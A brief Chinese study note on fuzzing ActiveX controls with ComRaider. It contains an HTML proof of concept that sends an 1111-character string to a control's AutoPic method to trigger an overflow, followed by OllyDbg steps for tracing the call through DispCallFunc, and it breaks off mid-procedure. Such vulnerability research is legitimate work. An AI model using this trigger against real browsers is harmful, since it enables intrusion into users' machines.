用ComRaider模糊测试
针对ActiveX控件的漏洞分析方法
poc
<html>
<body>
<object classid="clsid:128D0E38-1FF4-47C3-B0F7-0BAF90F568BF" id="target"></object>
<script>
var buffer = '';
while (buffer.length < 1111) buffer+="A";
target.AutoPic(buffer,"defaultV");
</script>
</body>
</html>
OD附加IE
ALT+E,找到模块OLEAUT32,双击进入
Crtl+N,找到函数DispCallFunc,双击进入
找到DispCallFunc函数中首个CALL ECX,下断,